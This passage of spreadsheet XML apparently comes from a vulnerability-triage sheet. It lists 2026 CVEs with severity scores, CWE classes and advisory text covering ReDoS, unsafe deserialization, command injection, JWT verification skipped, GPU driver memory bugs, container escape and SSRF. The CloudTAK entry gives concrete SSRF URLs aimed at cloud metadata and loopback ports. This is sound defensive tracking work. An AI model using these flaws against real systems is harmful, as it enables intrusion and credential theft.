        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>basic-ftp is an FTP client for Node.js. Prior to 6.2.1, Client.list() can be forced by a malicious or compromised FTP server to spend quadratic CPU time parsing a directory listing because the RE_LINE expression in src/parseListUnix.ts backtracks across adjacent variable-length owner and group fields when a long Unix-style line has a valid prefix but cannot satisfy the later size and date fields. parseList() selects a parser from the last nonblank line and then applies it to every line, so a normal final line can select the Unix parser while an earlier crafted line blocks the Node.js event loop and freezes the process. This issue is fixed in version 6.2.1.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102990</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102101</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Deserialization of Untrusted Data. A deserialization weakness in Kiteworks Core could, under certain conditions, allow crafted data to be deserialized unsafely, potentially resulting in remote code execution on the appliance. Exploitation depends on an attacker first being able to influence the affected data, so this issue is not exploitable on its own.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102101</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103473</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Deno versions 2.7.0 through 2.9.7 on Windows contain a command injection vulnerability in node:child_process where shell arguments are escaped for the wrong shell type. Attackers can inject OS commands by passing untrusted arguments with the shell option, allowing arbitrary command execution with Deno process privileges.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103473</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87004</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.31.3, when the OIDC login flow completes, backend/modules/auth/providers/auth_oidc_provider.py decodes the id_token returned by the identity provider's token endpoint using jose.jwt.get_unverified_claims() instead of jwt.decode(). This skips signature verification, audience (aud) validation, issuer (iss) validation, and expiry (exp) checking entirely. The extracted claims (email/sub/preferred_username) are then used directly as the user_id for the resulting Tugtainer session. This issue has been patched in version 1.31.3.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87004</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93994</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Apache MINA SSHD is a Java library for client-side and server-side SSH. SSH servers can be configured to require multi-authentication schemes, for instance two different public keys, not just one. In OpenSSH, this would be done by setting in sshd_config AuthenticationMethods "publickey,publickey". Apache MINA SSHD provides an equivalent configuration mechanism.
In Apache MINA SSHD versions up to 2.19.0 and 3.0.0-M1 to 3.0.0-M5 the server code in component sshd-core does not enforce that the two public keys presented are different. A user can thus successfully authenticate with only one of the two key pairs required by presenting this single key twice. This is a partial authentication bypass.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93994</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100256</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.3 rCE via Structural Search script constraints was possible in untrusted projects</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100256</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101885</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>ZeroClaw versions before 0.8.5 built with plugins-wasm feature contain a path traversal vulnerability in plugin installation that fails to validate the wasm_path manifest field. Attackers can convince users to install crafted plugins that write arbitrary files to paths outside the plugins directory, such as shell startup files, enabling code execution.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101885</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47498</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Manager contains a vulnerability in the GPU System Processor (GSP) plugin where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC message. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47498</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47503</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest VM user may cause an out-of-bounds write by sending a crafted RPC message with invalid performance state list size parameters. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47503</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47550</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an unprivileged local user can supply an untrusted pointer that the driver dereferences without validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47550</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47559</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could access memory belonging to another user's process. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47559</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62146</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-501</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>A trust-boundary flaw in CRI-O's sandbox state persistence allows attacker-influenced pod metadata to overwrite CRI-O's own reserved sandbox bookkeeping; once reloaded as trusted after a restart, a later container recreate in that sandbox can expose a host-side runtime-management resource inside the container, enabling container escape.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62146</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100266</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52366 missing authorisation allowed authenticated users to send arbitrary emails from the server's trusted address</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100266</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19553</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>ssl.SSLContext.wrap_bio() didn't require the server_hostname argument
to not be None if ssl.SSLContext.check_hostname was set. Due to a
missing parameter check in SSLObject, if the server_hostname argument
isn't supplied then hostname verification would be silently skipped.
This defect could lead to programs where certificate hostname verification
*appeared* to be succeeding with SSLContext.check_hostname = True and no
ValueError being raised due to misconfiguration.
If the program passes a server_hostname value that isn't an empty string
or None to any of these APIs then certificate hostname verification
proceeds as expected and the program is not affected by this vulnerability.
Mitigating this vulnerability doesn't require updating Python or applying
the patch. To mitigate, pass a valid non-None and non-empty
server_hostname value to SSLContext.wrap_bio(),
asyncio.create_connection(), or asyncio.loop.start_tls() and
certificate hostname verification will proceed as expected. Upgrading to
the latest version of Python or applying the patch only changes the
behavior from silently skipping hostname verification to raising a
ValueError, similar to SSLContext.wrap_socket(), when server_hostname
isn't supplied.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19553</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55177</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>tempo, requests</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>CloudTAK is a browser-based Common Operating Picture and situational awareness tool compatible with TAK. Prior to version 13.10.0, every route in the ESRI helper family (api/routes/esri.ts) takes a fully attacker-controlled URL from the request (POST /api/esri body url, and the portal / server / layer query parameters on the GET /api/esri/* routes) and passes it into EsriBase / EsriProxyPortal / EsriProxyServer / EsriProxyLayer in api/lib/esri.ts, which fetch it with the bare fetch from @tak-ps/etl. No IP / DNS / hostname classification is applied at any point, so the destination is never validated against private, loopback, or link-local ranges. Any authenticated user (the routes only require Auth.is_auth(config, req, { anyResources: true }), i.e. any token, not an admin) can therefore make the CloudTAK server issue arbitrary outbound GET/POST requests to internal addresses such as the cloud instance-metadata service (169.254.169.254), loopback admin ports (127.0.0.1:&lt;port&gt;), and other hosts reachable only from inside the deployment VPC. This is a full-read SSRF, not blind: on success the upstream JSON body is returned to the caller via res.json(...), and on failure the upstream error string is reflected verbatim as ESRI Server Error: &lt;message&gt;. An attacker can read cloud metadata (and the temporary IAM credentials the instance role exposes), enumerate internal services, and exfiltrate their response bodies. The sniff() URL classifier provides no protection: it only pattern-matches the pathname (/rest, /arcgis/rest, /sharing/rest), so a URL like http://169.254.169.254/arcgis/rest or http://127.0.0.1:8500/rest passes sniff() and is fetched. This issue has been patched in version 13.10.0.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55177</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62097</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
